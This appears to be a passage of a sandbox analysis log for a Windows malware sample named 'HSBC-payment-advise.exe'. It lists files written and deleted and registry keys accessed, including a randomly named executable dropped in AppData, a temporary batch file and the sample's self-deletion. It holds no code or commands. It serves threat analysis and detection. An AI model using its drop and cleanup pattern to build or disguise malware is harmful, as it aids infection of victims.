C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\Globalization\Sorting\sortdefault.nls
\??\ide#diskvbox_harddisk___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Write Files

C:\Users\Seven01\AppData\Local\Temp\tmp1F4A.tmp
C:\Users\Seven01\AppData\Local\Temp\tmp1FA9.tmp
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede\wawuydvi.tyg
C:\Users\Seven01\AppData\Roaming\Emixabexore\ovepuxtuyki.ewe
C:\Users\Seven01\AppData\Local\Temp\tmpb62df5cb.bat
C:\Users\Seven01\AppData\Local\Temp\tmp3081.tmp
C:\Users\Seven01\AppData\Local\Temp\tmp30EF.tmp
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede\wawuydvi.tmp
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Windows\inf\hdaudio.PNF
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2080.26468578
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2080.26468578
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2080.26468625
C:\Users\Seven01\AppData\Local\Temp\tmp1F4A.tmp
C:\Users\Seven01\AppData\Local\Temp\tmp1FA9.tmp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2436.26474421
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2436.26474421
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2436.26474421
C:\Users\Seven01\AppData\Local\Temp\tmp3081.tmp
C:\Users\Seven01\AppData\Local\Temp\tmp30EF.tmp
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede\wawuydvi.tyg
C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.exe
C:\Users\Seven01\AppData\Local\Temp\tmpb62df5cb.bat

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HSBC-payment-advise.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\32e86d16\7d04c116
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
